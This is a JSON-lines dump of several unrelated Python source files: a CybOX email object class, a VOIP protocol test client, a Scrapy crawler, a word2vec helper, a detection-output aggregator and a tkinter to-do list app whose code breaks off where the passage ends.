email_obj.set_Raw_Body(self.raw_body.to_obj())\n if self.raw_header:\n email_obj.set_Raw_Header(self.raw_header.to_obj())\n\n return email_obj\n\n def to_dict(self):\n email_dict = {}\n if self.attachments:\n email_dict['attachments'] = [a.to_dict() for a in self.attachments]\n if self.links:\n email_dict['links'] = [l.to_dict() for l in self.links]\n email_dict['header'] = self.header.to_dict()\n if self.optional_header:\n email_dict['optional_header'] = self.optional_header.to_dict()\n if self.email_server:\n email_dict['email_server'] = self.email_server.to_dict()\n if self.raw_body:\n email_dict['raw_body'] = self.raw_body.to_dict()\n if self.raw_header:\n email_dict['raw_header'] = self.raw_header.to_dict()\n email_dict['xsi_type'] = self._XSI_TYPE\n \n return email_dict\n\n @staticmethod\n def from_obj(message_obj):\n message = EmailMessage()\n\n attachments = message_obj.get_Attachments()\n if attachments:\n for attachment in attachments.get_File():\n message.attachments.append(File.from_obj(attachment))\n\n links = message_obj.get_Links()\n if links:\n for link in links.get_Link():\n message.links.append(URI.from_obj(link))\n\n message.header = EmailHeader.from_obj(message_obj.get_Header())\n message.optional_header = OptionalHeader.from_obj(message_obj.get_Optional_Header())\n message.email_server = String.from_obj(message_obj.get_Email_Server())\n message.raw_body = String.from_obj(message_obj.get_Raw_Body())\n message.raw_header = String.from_obj(message_obj.get_Raw_Header())\n\n return message\n\n @staticmethod\n def from_dict(message_dict):\n message = EmailMessage()\n\n for attachment in message_dict.get('attachments', []):\n message.attachments.append(File.from_dict(attachment))\n for link in message_dict.get('links', []):\n message.links.append(URI.from_dict(link))\n message.header = EmailHeader.from_dict(message_dict.get('header'))\n message.optional_header = OptionalHeader.from_dict(message_dict.get('optional_header'))\n message.email_server = String.from_dict(message_dict.get('email_server'))\n message.raw_body = String.from_dict(message_dict.get('raw_body'))\n message.raw_header = String.from_dict(message_dict.get('raw_header'))\n\n 
return message\n","sub_path":"cybox/objects/email_message_object.py","file_name":"email_message_object.py","file_ext":"py","file_size_in_byte":17842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"164302608","text":"import base64\nimport json\nimport md5\nimport os\nimport select\nimport socket\nimport struct\nimport sys\nimport threading\nimport time\n\nimport requests\n\nMSG_HEARTBEAT = 1\nMSG_AUTH = 2\nMSG_AUTH_STATUS = 3\nMSG_ACK = 5\nMSG_PING = 13\nMSG_PONG = 14\nMSG_AUTH_TOKEN = 15\n\nMSG_VOIP_CONTROL = 64\nMSG_VOIP_DATA = 65\n\n\nVOIP_COMMAND_DIAL = 1\nVOIP_COMMAND_ACCEPT = 2\nVOIP_COMMAND_CONNECTED = 3\nVOIP_COMMAND_REFUSE = 4\nVOIP_COMMAND_REFUSED = 5\nVOIP_COMMAND_HANG_UP = 6\nVOIP_COMMAND_RESET = 7\nVOIP_COMMAND_TALKING = 8\n\n\nPLATFORM_IOS = 1\nPLATFORM_ANDROID = 2\n\nPROTOCOL_VERSION = 1\n\nAPP_ID = 7\nAPP_KEY = \"sVDIlIiDUm7tWPYWhi6kfNbrqui3ez44\"\nAPP_SECRET = '0WiCxAU1jh76SbgaaFC7qIaBPm2zkyM1'\n\nHOST = \"127.0.0.1\"\nPORT = 23000\nURL = \"http://192.168.33.10\"\n\ndevice_id = \"f9d2a7c2-701a-11e5-9c3e-34363bd464b2\"\nclass AuthenticationToken:\n def __init__(self):\n self.token = \"\"\n self.platform_id = PLATFORM_ANDROID\n self.device_id = device_id\n\n\nclass VOIPControl:\n def __init__(self):\n self.sender = 0\n self.receiver = 0\n self.cmd = 0\n self.dial_count = 1\n\nclass VOIPData:\n def __init__(self):\n self.sender = 0\n self.receiver = 0\n self.content = \"\"\n\ndef send_message(cmd, seq, msg, sock):\n if cmd == MSG_AUTH:\n h = struct.pack(\"!iibbbb\", 8, seq, cmd, PROTOCOL_VERSION, 0, 0)\n b = struct.pack(\"!q\", msg.uid)\n sock.sendall(h + b)\n elif cmd == MSG_VOIP_CONTROL:\n if msg.cmd == VOIP_COMMAND_DIAL:\n length = 24\n else:\n length = 20\n \n h = struct.pack(\"!iibbbb\", length, seq, cmd, PROTOCOL_VERSION, 0, 0)\n b = struct.pack(\"!qqi\", msg.sender, msg.receiver, msg.cmd)\n t = \"\"\n if msg.cmd == VOIP_COMMAND_DIAL:\n t = struct.pack(\"!i\", msg.dial_count)\n sock.sendall(h+b+t)\n elif cmd == MSG_VOIP_DATA:\n length = 16 + len(msg.content)\n h = struct.pack(\"!iibbbb\", length, seq, cmd, PROTOCOL_VERSION, 0, 0)\n b = struct.pack(\"!qq\", msg.sender, msg.receiver)\n sock.sendall(h+b+msg.content)\n elif cmd == MSG_AUTH_TOKEN:\n b = struct.pack(\"!BB\", msg.platform_id, len(msg.token)) + msg.token + struct.pack(\"!B\", len(msg.device_id)) + msg.device_id\n length = len(b)\n h = struct.pack(\"!iibbbb\", length, seq, cmd, PROTOCOL_VERSION, 0, 0)\n sock.sendall(h+b)\n else:\n print(\"eeeeee:\", cmd)\n\ndef recv_message(sock):\n buf = sock.recv(12)\n if len(buf) != 12:\n return 0, 0, None\n length, seq, cmd = struct.unpack(\"!iib\", buf[:9])\n content = sock.recv(length)\n if len(content) != length:\n return 0, 0, None\n\n if cmd == MSG_AUTH_STATUS:\n print(len(content), \"....\")\n status, = struct.unpack(\"!i\", content)\n return cmd, seq, status\n elif cmd == MSG_VOIP_CONTROL:\n ctl = VOIPControl()\n ctl.sender, ctl.receiver, ctl.cmd = struct.unpack(\"!qqi\", content[:20])\n if ctl.cmd == VOIP_COMMAND_DIAL:\n ctl.dial_count = struct.unpack(\"!i\", content[20:24])\n return cmd, seq, ctl\n elif cmd == MSG_VOIP_DATA:\n d = VOIPData()\n d.sender, d.receiver = struct.unpack(\"!qq\", content[:16])\n d.content = content[16:]\n return cmd, seq, d\n else:\n return cmd, seq, content\n\n\ndef login(uid):\n url = URL + \"/auth/grant\"\n obj = {\"uid\":uid, \"user_name\":str(uid)}\n secret = md5.new(APP_SECRET).digest().encode(\"hex\")\n basic = base64.b64encode(str(APP_ID) + \":\" + secret)\n headers = 
{'Content-Type': 'application/json; charset=UTF-8',\n 'Authorization': 'Basic ' + basic}\n \n res = requests.post(url, data=json.dumps(obj), headers=headers)\n if res.status_code != 200:\n print(res.status_code, res.content)\n return None\n obj = json.loads(res.text)\n return obj[\"data\"][\"token\"]\n\n\ndef connect_server(uid, port):\n token = login(uid)\n if not token:\n return None, 0\n seq = 0\n address = (HOST, port)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n sock.connect(address)\n auth = AuthenticationToken()\n auth.token = token\n seq = seq + 1\n send_message(MSG_AUTH_TOKEN, seq, auth, sock)\n cmd, _, msg = recv_message(sock)\n if cmd != MSG_AUTH_STATUS or msg != 0:\n return None, 0\n return sock, seq\n\ndef send_control(sock, seq, sender, receiver, cmd):\n ctl = VOIPControl()\n ctl.sender = sender\n ctl.receiver = receiver\n ctl.cmd = cmd\n send_message(MSG_VOIP_CONTROL, seq, ctl, sock)\n \ndef send_dial(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_DIAL)\n \ndef send_accept(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_ACCEPT)\n \ndef send_refuse(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_REFUSE)\n \ndef send_refused(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_REFUSED)\n\ndef send_connected(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_CONNECTED)\n \ndef simultaneous_dial():\n caller = 86013800000000\n called = 86013800000009\n\n sock, seq = connect_server(caller, PORT)\n seq = seq + 1\n send_dial(sock, seq, caller, called)\n\n cmd, _, msg = recv_message(sock)\n if cmd != MSG_VOIP_CONTROL:\n return\n if msg.cmd == VOIP_COMMAND_ACCEPT:\n seq = seq + 1\n send_connected(sock, seq, caller, called)\n print(\"voip connected\")\n elif msg.cmd == VOIP_COMMAND_DIAL:\n seq = seq + 1\n send_accept(sock, seq, caller, called)\n cmd, _, msg = recv_message(sock)\n if cmd != MSG_VOIP_CONTROL:\n return\n\n if msg.cmd == VOIP_COMMAND_CONNECTED:\n print(\"voip connected\")\n elif msg.cmd == VOIP_COMMAND_ACCEPT:\n print(\"voip connected\")\n else:\n return\n elif msg.cmd == VOIP_COMMAND_REFUSE:\n print(\"dial refused\")\n seq = seq + 1\n send_refused(sock, seq, caller, called)\n return\n else:\n print(\"unknow:\", msg.content)\n return\n\n while True:\n cmd, _, msg = recv_message(sock)\n if cmd == MSG_VOIP_CONTROL:\n print(\"recv voip control:\", msg.cmd)\n if msg.cmd == VOIP_COMMAND_HANG_UP:\n print(\"peer hang up\")\n break\n else:\n print(\"unknow command:\", cmd)\n \ndef listen():\n caller = 0\n called = 86013800000009\n sock, seq = connect_server(called, PORT)\n while True:\n print(\"recv...\")\n cmd, _, msg = recv_message(sock)\n print(cmd, msg)\n if cmd != MSG_VOIP_CONTROL:\n continue\n if msg.cmd != VOIP_COMMAND_DIAL:\n continue\n caller = msg.sender\n break\n\n is_accept = query_yes_no(\"accept incoming dial\")\n if is_accept:\n seq = seq + 1\n send_accept(sock, seq, called, caller)\n while True:\n cmd, _, msg = recv_message(sock)\n if cmd != MSG_VOIP_CONTROL:\n continue\n\n if msg.cmd != VOIP_COMMAND_CONNECTED:\n continue\n else:\n print(\"voip control:\", msg.cmd)\n print(\"voip connected caller:%d called:%d\"%(caller, called))\n break\n else:\n seq = seq + 1\n send_refuse(sock, seq, called, caller)\n return\n\n address = ('0.0.0.0', 20001)\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \n b = struct.pack(\"!qq\", called, caller)\n b += \"\\x00\\x00\"\n 
s.sendto(b, (HOST, 20001))\n\n    while True:\n        rs, _, _ = select.select([s, sock], [], [])\n        if s in rs:\n            data, addr = s.recvfrom(64*1024)\n            sender, receiver = struct.unpack(\"!qq\", data[:16])\n            print(\"sender:\", sender, \"receiver:\", receiver, \" size:\", len(data[16:]))\n        if sock in rs:\n            cmd, _, msg = recv_message(sock)\n            if cmd == MSG_VOIP_CONTROL:\n                print(\"recv voip control:\", msg.cmd)\n                if msg.cmd == VOIP_COMMAND_HANG_UP:\n                    print(\"peer hang up\")\n                    break\n            elif cmd == 0:\n                print(\"voip control socket closed\")\n                break\n            else:\n                print(\"unknown command:\", cmd)\n\ndef query_yes_no(question, default=\"yes\"):\n    \"\"\"Ask a yes/no question via raw_input() and return their answer.\n\n    \"question\" is a string that is presented to the user.\n    \"default\" is the presumed answer if the user just hits <Enter>.\n    It must be \"yes\" (the default), \"no\" or None (meaning\n    an answer is required of the user).\n\n    The \"answer\" return value is one of \"yes\" or \"no\".\n    \"\"\"\n    valid = {\"yes\": True, \"y\": True, \"ye\": True,\n             \"no\": False, \"n\": False}\n    if default is None:\n        prompt = \" [y/n] \"\n    elif default == \"yes\":\n        prompt = \" [Y/n] \"\n    elif default == \"no\":\n        prompt = \" [y/N] \"\n    else:\n        raise ValueError(\"invalid default answer: '%s'\" % default)\n\n    while True:\n        sys.stdout.write(question + prompt)\n        choice = raw_input().lower()\n        if default is not None and choice == '':\n            return valid[default]\n        elif choice in valid:\n            return valid[choice]\n        else:\n            sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n                             \"(or 'y' or 'n').\\n\")\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 2:\n        print(\"usage:voip_client.py call/wait\")\n        sys.exit(0)\n    if sys.argv[1] == \"call\":\n        simultaneous_dial()\n    elif sys.argv[1] == \"wait\":\n        listen()\n    else:\n        print(\"usage:voip_client.py call/wait\")\n","sub_path":"tests/voip_client.py","file_name":"voip_client.py","file_ext":"py","file_size_in_byte":9728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"624180013","text":"import scrapy\nfilepath = 'C:/Users/harsh/PycharmProjects/IR Project/pages/'\nurlpath = 'C:/Users/harsh/PycharmProjects/IR Project/'\nclass ToScrapeCSSSpider(scrapy.Spider):\n    name = \"toscrape\"\n    allowed_domains = [\"uic.edu\"]\n    start_urls = [\n        \"https://www.cs.uic.edu/\"\n    ]\n    custom_settings = {'DEPTH_PRIORITY':1, 'SCHEDULER_DISK_QUEUE': 'scrapy.squeues.PickleFifoDiskQueue',\n                       'SCHEDULER_MEMORY_QUEUE': 'scrapy.squeues.FifoMemoryQueue'}\n    count = 0\n    count_max = 3000\n    url_list = dict()\n    def parse(self, response):\n        if self.count < self.count_max:\n            if response.url not in self.url_list.keys():\n                self.url_list[response.url] = 1\n                self.count += 1\n                filename = str(self.count) + '.html'\n                global filepath\n                with open(filepath + filename, 'wb') as f:\n                    f.write(response.body)\n                with open(urlpath + 'urlList.txt', 'a') as x:\n                    x.write(response.url + \"\\n\")\n            urls = response.css('a::attr(href)')\n            for url in urls:\n                yield response.follow(url, callback=self.parse)\n        else:\n            raise scrapy.exceptions.CloseSpider(reason='Page Count Reached')\n        return","sub_path":"crawler/spiders/toscrape.py","file_name":"toscrape.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252688800","text":"#!/usr/bin/env python3\r\n\"\"\"\r\n1. 
word2vec\r\n\"\"\"\r\n\r\nimport gensim as g\r\n\r\n\r\ndef word2vec_model(sentences,\r\n                   size=100,\r\n                   min_count=5,\r\n                   window=5,\r\n                   negative=5,\r\n                   cbow=True,\r\n                   iterations=5,\r\n                   seed=0,\r\n                   workers=1):\r\n    \"\"\"[Function that creates and trains a gensim word2vec model]\r\n\r\n    Args:\r\n        sentences ([list]): [sentences to be trained on]\r\n        size (int, optional): [is the dimensionality of the embedding\r\n                               layer]. Defaults to 100.\r\n        min_count (int, optional): [minimum number of occurrences of a word\r\n                                    for use in training]. Defaults to 5.\r\n        window (int, optional): [maximum distance between the current and\r\n                                 predicted word within a sentence].\r\n                                 Defaults to 5.\r\n        negative (int, optional): [size of negative sampling]. Defaults to 5\r\n        cbow (bool, optional): [boolean to determine the training type;\r\n                                True is for CBOW; False is for Skip-gram]\r\n                                Defaults to True.\r\n        iterations (int, optional): [number of iterations to train over].\r\n                                    Defaults to 5.\r\n        seed (int, optional): [seed for the random number generator].\r\n                              Defaults to 0.\r\n        workers (int, optional): [number of worker threads to train the\r\n                                  model]. Defaults to 1.\r\n\r\n    Returns:\r\n        [type]: [the trained model]\r\n    \"\"\"\r\n\r\n    # https://radimrehurek.com/gensim/models/word2vec.html\r\n\r\n    sg = 0 if cbow else 1\r\n\r\n    model = g.models.Word2Vec(sentences=sentences,\r\n                              size=size,\r\n                              window=window,\r\n                              min_count=min_count,\r\n                              negative=negative,\r\n                              sg=sg,\r\n                              seed=seed,\r\n                              workers=workers,\r\n                              iter=iterations)\r\n\r\n    total_examples = model.corpus_count\r\n\r\n    # To avoid common mistakes around the model’s ability to do multiple\r\n    # training passes itself, an explicit epochs argument MUST be provided.\r\n    # In the common and recommended case where train() is only called once,\r\n    # you can set epochs=self.iter.\r\n    epochs = model.iter\r\n\r\n    model.train(sentences=sentences,\r\n                total_examples=total_examples,\r\n                epochs=epochs)\r\n\r\n    return model\r\n","sub_path":"supervised_learning/0x0F-word_embeddings/2-word2vec.py","file_name":"2-word2vec.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"609792802","text":"from fast_rcnn.nms_wrapper import nms\nimport numpy as np\nimport cPickle\nimport os\nfrom cache.test_results_cache import TestResultsCache\n\n\nclass aggregateModelOutput():\n    \n    def __init__(self,imdb,num_samples,output_dir,task,score_thresh,nms_thresh,max_dets_per_image,visualize_bool,cfg):\n        self.visualize_bool = visualize_bool\n        self.score_thresh = score_thresh\n        self.num_samples = num_samples\n        self.nms_thresh = nms_thresh\n        self.task = task\n        self.results = None\n        self.det_file = None\n        self.save_key = None\n        self.num_classes = imdb.num_classes\n        self.init_results_obj(output_dir) # sets above variables\n        self.classes = imdb.classes\n        self.max_dets_per_image = max_dets_per_image\n        self.save_cache = TestResultsCache(output_dir,cfg,imdb.config,None,'agg_model_output')\n\n    def init_results_obj(self,output_dir):\n        if self.task == 'object_detection':\n            all_boxes = [[[] for _ in xrange(self.num_samples)]\n                         for _ in xrange(self.num_classes)]\n            self.results = all_boxes\n            self.det_file = os.path.join(output_dir, 'probs.pkl')\n            self.save_key = 'all_boxes'\n        elif self.task == 'classification':\n            all_probs = [[-1 for _ in xrange(self.num_samples)]\n                         for _ in xrange(self.num_classes)]\n            self.results = all_probs\n            self.det_file = os.path.join(output_dir, 'probs.pkl')\n            self.save_key = 'all_probs'\n        elif 
self.task == 'regression':\n all_estimates = [None for _ in xrange(self.num_samples)]\n self.results = all_estimates\n self.det_file = os.path.join(output_dir, 'regression.pkl')\n self.save_key = 'all_probs'\n else:\n raise ValueError(\"unknown task [agg_model_output.py]: {}\".format(self.task))\n\n def clear(self):\n if self.task == 'object_detection':\n all_boxes = [[[] for _ in xrange(self.num_samples)]\n for _ in xrange(self.num_classes)]\n self.results = all_boxes\n elif self.task == 'classification':\n all_probs = [[-1 for _ in xrange(self.num_samples)]\n for _ in xrange(self.num_classes)]\n self.results = all_probs\n elif self.task == 'regression':\n all_estimates = [[] for _ in xrange(self.num_samples)]\n self.results = all_estimates\n else:\n raise ValueError(\"unknown task [agg_model_output.py]: {}\".format(self.task)) \n\n def aggregate(self,model_output,sample_index):\n if self.task == 'object_detection':\n self.aggregateDetections(model_output,sample_index)\n elif self.task == 'classification':\n self.aggregateClassification(model_output['scores'],sample_index)\n elif self.task == 'regression':\n self.aggregateRegression(model_output['scores'],sample_index)\n else:\n raise ValueError(\"unknown task [agg_model_output.py]: {}\".format(self.task))\n\n def load(self):\n results = self.save_cache.load()\n if results is not None:\n self.results = results\n return results\n\n def save(self):\n self.save_cache.save(self.results)\n\n def aggregateClassification(self,scores,sample_index):\n # handle special case\n if scores.size == 1:\n self.results[0][sample_index] = float(scores)\n return\n scores = np.squeeze(scores)\n if self.num_classes == 1:\n self.results[0][sample_index] = float(scores[0])\n else:\n if len(scores) != len(self.results):\n print(\"do you need to use 'corg'? 
nclasses for (model_output_size,data) = ({},{})\".format(len(scores),len(self.results)))\n for class_index in xrange(0, self.num_classes):\n self.results[class_index][sample_index] = float(scores[class_index])\n\n def aggregateDetections(self,model_output,sample_index):\n scores = model_output['scores']\n boxes = model_output['boxes'] # bug fix: the boxes live under the 'boxes' key, not 'scores'\n for class_index in xrange(1, self.num_classes):\n inds = np.where(scores[:, class_index] > self.score_thresh)[0]\n cls_scores = scores[inds, class_index]\n cls_boxes = boxes[inds, class_index*4:(class_index+1)*4]\n cls_dets = np.hstack((cls_boxes, cls_scores[:, np.newaxis])) \\\n .astype(np.float32, copy=False)\n keep = nms(cls_dets, self.nms_thresh)\n cls_dets = cls_dets[keep, :]\n # visualization needs the source image; assume an optional 'image' key in model_output\n if self.visualize_bool and 'image' in model_output:\n self.visualizeDetectionsOneClass(model_output['image'], cls_dets, self.classes[class_index])\n self.results[class_index][sample_index] = cls_dets\n # Limit to max_per_image detections *over all classes*\n if self.max_dets_per_image:\n image_scores = np.hstack([self.results[class_index][sample_index][:, -1] for class_index in xrange(1, self.num_classes)])\n if len(image_scores) > self.max_dets_per_image:\n image_thresh = np.sort(image_scores)[-self.max_dets_per_image]\n for class_index in xrange(1, self.num_classes):\n keep = np.where(self.results[class_index][sample_index][:, -1] >= image_thresh)[0]\n self.results[class_index][sample_index] = self.results[class_index][sample_index][keep, :]\n\n def aggregateRegression(self,regression_values,sample_index):\n self.results[sample_index] = regression_values[0][0]\n\n def visualizeCheck(self,vis_override):\n if vis_override is True:\n return True\n else:\n return self.visualize_bool\n\n def visualizeDetectionsByClass(self,scores,boxes,image,vis_override=False):\n if self.visualizeCheck(vis_override) is False: return\n import matplotlib\n matplotlib.use('Agg')\n for class_index in xrange(1, self.num_classes):\n inds = np.where(scores[:, class_index] > self.score_thresh)[0]\n cls_scores = scores[inds, class_index]\n cls_boxes = boxes[inds, class_index*4:(class_index+1)*4] # bug fix: slice the four box coordinates for this class\n cls_dets = np.hstack((cls_boxes, cls_scores[:, np.newaxis])).astype(np.float32, copy=False)\n keep = nms(cls_dets, self.nms_thresh)\n cls_dets = cls_dets[keep, :]\n cls_name = self.classes[class_index]\n self.visualizeDetectionsOneClass(image, cls_dets, cls_name)\n\n def visualizeDetectionsOneClass(self,image, dets, class_name, thresh=0.3,vis_override=False):\n \"\"\"Visual debugging of detections.\"\"\"\n if self.visualizeCheck(vis_override) is False: return\n import matplotlib.pyplot as plt\n im = image[:, :, (2, 1, 0)] # BGR -> RGB for matplotlib\n for i in xrange(np.minimum(10, dets.shape[0])):\n bbox = dets[i, :4]\n score = dets[i, -1]\n if score > thresh:\n plt.cla()\n plt.imshow(im)\n plt.gca().add_patch(\n plt.Rectangle((bbox[0], bbox[1]),\n bbox[2] - bbox[0],\n bbox[3] - bbox[1], fill=False,\n edgecolor='g', linewidth=3)\n )\n plt.title('{} {:.3f}'.format(class_name, score))\n plt.show()\n","sub_path":"lib/core/test_utils/agg_model_output.py","file_name":"agg_model_output.py","file_ext":"py","file_size_in_byte":7258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"272574818","text":"# To-do List\n\n# Imports\n# GUI\nimport tkinter as tk\nimport tkinter.messagebox as messagebox\nfrom tkinter import *\nfrom tkinter.font import Font\nfrom tkmacosx import Button, CircleButton\n\n# Audio\nfrom playsound import playsound\n\n# Date and time\nimport datetime\n\n# Images\nfrom PIL import Image, ImageTk\n\n# Data storage\nimport json\n\n# Notifications\nimport os\n\n# Email\nimport smtplib\n\n# Email 
verification\nfrom validate_email import validate_email\n\n# Title and message for 'email sent' confirmation\ntitle = \"To-do List\"\nmessage = \"Success; email has been sent\"\n\n\n# Housing of the program\nclass ToDo:\n def __init__(self):\n self.root_1 = tk.Tk()\n self.root_1.title(\"To-do List\") # Title of the window\n self.root_1.geometry('370x500+600+75') # Window size\n self.root_1.resizable(False, False) # Disable window resizing\n\n # Main body (1)\n # Switching between the home page and the settings page will be done so by\n # creating a frame, then deleting the prior frame\n def home(self):\n # Reading the JSON file (denoted by \"r\")\n with open(\"data.json\", \"r\") as file:\n self.data = json.load(file)\n\n # Creates a new frame for the home page\n self.root = tk.Frame(self.root_1, width=370, height=500,\n bg=self.data[\"bg_colour\"])\n self.root.place(x=0, y=0)\n\n # Title (1)\n # Font\n self.title_label_font = Font(\n family=\"SF Pro Rounded\", # Font name\n size=20, # Font size\n weight=\"bold\" # Font weight\n )\n # Title name and colour\n self.title_label = tk.Label(self.root, text=\"To-do List\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.title_label.place(x=30, y=25)\n\n # Inputs (1)\n # Task name entry\n self.new_task_entry_var = tk.StringVar() # Holds a string\n self.new_task_entry = Entry(self.root,\n textvariable=self.new_task_entry_var,\n width=11)\n self.new_task_entry.place(x=35, y=75)\n # Time entry\n self.new_task_time_var = tk.StringVar()\n # Places the current time into the input field\n self.current_time = datetime.datetime.now()\n # Converts the time using strftime where we are able to denote hours\n # by %H and minutes by %M\n self.current_time = self.current_time.strftime(\n \"%H\") + \":\" + self.current_time.strftime(\"%M\")\n self.new_task_time_var.set(str(self.current_time))\n self.new_task_time = Entry(self.root,\n textvariable=self.new_task_time_var,\n width=5)\n self.new_task_time.place(x=156, y=75)\n # Date entry\n self.date_var = tk.StringVar()\n # Places the current date into the input field\n self.current_day = datetime.datetime.now()\n # Identifies \"locale’s appropriate date representation\" (%x)\n self.current_day = self.current_day.strftime(\"%x\")\n self.date_var.set(self.current_day)\n self.data_entry = Entry(self.root, textvariable=self.date_var, width=7)\n self.data_entry.place(x=223, y=75)\n\n # List (1)\n # Displays all inputted tasks\n self.list_tasks = tk.Listbox(self.root, width=29, height=16,\n selectmode='single')\n self.list_tasks.place(x=35, y=125)\n\n # Buttons (1)\n # Button which adds a task\n self.add_image = ImageTk.PhotoImage(Image.open(\"/Users/vic\"\n \"/PycharmProjects\"\n \"/todo/images/add.png\"))\n self.add_task_button = CircleButton(self.root, image=self.add_image,\n bg='#ffffff', fg='#000000',\n borderless=1,\n width=35, command=self.add_task)\n self.add_task_button.place(x=308, y=71)\n\n # Makes it so the tasks which are stored in data.json show up in the\n # list of the GUI\n for i in self.data[\"data\"]:\n # inserts tasks so that task: name - time date\n self.list_tasks.insert(tk.END, i[0] + \" - \" + i[1] + \" \" + i[2])\n\n # Button which deletes the selected task\n self.delete_selected = Button(self.root, text=\"Delete\", bg='#ffffff',\n fg='#000000', borderless=1,\n activebackground=('#CD3F5D', '#CD3F5D'),\n command=self.delete_selected_func)\n self.delete_selected.place(x=35, y=423)\n # Button which deletes all inputted tasks\n self.delete_all = 
Button(self.root, text=\"Delete All\", bg='#ffffff',\n fg='#000000', borderless=1,\n activebackground=('#CD3F5D', '#CD3F5D'),\n command=self.delete_all_func)\n self.delete_all.place(x=130, y=423)\n # Button which opens up the settings page\n self.settings_image = ImageTk.PhotoImage(\n Image.open(\"/Users/vic/PycharmProjects/todo/images/settings.png\"))\n self.settings_button = CircleButton(self.root,\n image=self.settings_image,\n bg='#ffffff', fg='#000000',\n borderless=1, width=35,\n command=self.settings)\n self.settings_button.place(x=308, y=418)\n\n self.root_1.after(50, self.send_email())\n\n self.root_1.mainloop()\n\n # Deletes selected task\n def delete_selected_func(self):\n playsound(\"/Users/vic/PycharmProjects/todo/audio/delete.mp3\")\n # Identifies selected task from listbox\n for i in self.list_tasks.curselection():\n self.data[\"data\"].pop(i)\n\n self.list_tasks.delete(tk.ANCHOR)\n\n # Writing to the JSON file (denoted by the \"w\") - removing selected\n # task\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n\n # Deletes all inputted tasks\n def delete_all_func(self):\n playsound(\"/Users/vic/PycharmProjects/todo/audio/delete_all.mp3\")\n # Deletes first task - last task that was inputted\n self.list_tasks.delete(\"0\", \"end\")\n # Rewrites JSON / makes data section blank\n self.data[\"data\"] = []\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n\n # Adds task\n def add_task(self):\n playsound(\"/Users/vic/PycharmProjects/todo/audio/add.mp3\")\n # If there is an email inputted\n if self.data[\"email\"]:\n # If the entry task is blank, (\\ for syntax purposes)\n if self.new_task_entry_var.get() == \"\" or \\\n self.new_task_time_var.get() == \"\" or \\\n self.date_var.get() == \"\":\n messagebox.showinfo(\"Invalid Input!\",\n \"An input appears to be blank\")\n return\n try:\n # Removes : and / from time and date to make them \"simple\"\n int(self.new_task_time_var.get().replace(\":\", \"\"))\n int(self.date_var.get().replace(\"/\", \"\"))\n\n # i = task name, time, date\n i = [\"\", self.new_task_time_var.get(),\n self.date_var.get()]\n\n # Python lists start at 0\n # e.g. 
i[2][-2] will go to the second element of JSON which is\n # the date, and take the last 2 numbers ([-2] and [-1])\n # (index)\n year = \"20\" + i[2][-2] + i[2][-1]\n year = int(year)\n month = i[2][-5] + i[2][-4]\n month = int(month)\n day = i[2][0] + i[2][1]\n day = int(day)\n hour = i[1][0] + i[1][1]\n hour = int(hour)\n minute = i[1][-2] + i[1][-1]\n minute = int(minute)\n\n date_old = datetime.datetime(year, day, month, hour, minute)\n\n if datetime.datetime.now() > date_old:\n messagebox.showinfo(\"Invalid Input!\",\n \"Inputted time and/or date is before \"\n \"the actual time\")\n return\n else:\n self.list_tasks.insert(tk.END,\n self.new_task_entry_var.get() +\n \" - \" +\n self.new_task_time_var.get() + \" \" +\n self.date_var.get())\n # Appending the added task into the JSON\n self.data[\"data\"].append([self.new_task_entry_var.get(),\n self.new_task_time_var.get(),\n self.date_var.get(), \"1\"])\n with open(\"data.json\", \"w\") as file:\n json.dump(self.data, file)\n\n except:\n messagebox.showinfo(\"Invalid Input!\",\n \"Invalid date or time format\")\n return\n\n else:\n messagebox.showinfo(\"Invalid Input!\",\n \"An email has not been inputted\")\n\n # Settings page (2)\n def settings(self):\n # Creates a new frame for the preferences page\n self.root = tk.Frame(self.root_1, width=370, height=500,\n bg=self.data[\"bg_colour\"])\n self.root.place(x=0, y=0)\n\n # Title (2)\n # Font\n self.title_label_font = Font(\n family=\"SF Pro Rounded\",\n size=20,\n weight=\"bold\"\n )\n # Title name and colour - Preferences\n self.title_label = tk.Label(self.root, text=\"Preferences\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.title_label.place(x=30, y=35)\n\n # Buttons (2)\n # Button which returns back to the home page\n self.back_button = Button(self.root, text=\"Back\", bg='#ffffff',\n fg='#000000', borderless=1,\n command=self.home)\n self.back_button.place(x=3, y=3)\n\n # Options\n # Themes\n # Title name and colour - Themes\n self.pref_label = tk.Label(self.root, text=\"Themes\",\n font=self.title_label_font,\n fg=self.data[\"text_colour\"],\n bg=self.data[\"bg_colour\"])\n self.pref_label.place(x=30, y=80)\n\n # Button which alters the theme and text colour\n # The self.change_bg(\"bg, text\") refers back to the def\n # White background, black text\n self.colour_white = Button(self.root, font=\"15\",\n bg='#F4F3F1', fg='#F4F3F1', borderless=1,\n width=25, highlightbackground='#2E2F30',\n command=lambda: self.change_bg('#F4F3F1',\n \"black\"))\n self.colour_white.place(x=35, y=125)\n # Black background, white text\n self.colour_black = Button(self.root, font=\"15\",\n bg='#232326', fg='#232326', borderless=1,\n width=25,\n command=lambda: self.change_bg('#232326',\n \"white\"))\n self.colour_black.place(x=65, y=125)\n # Red background, black text\n self.colour_red = Button(self.root, font=\"15\",\n 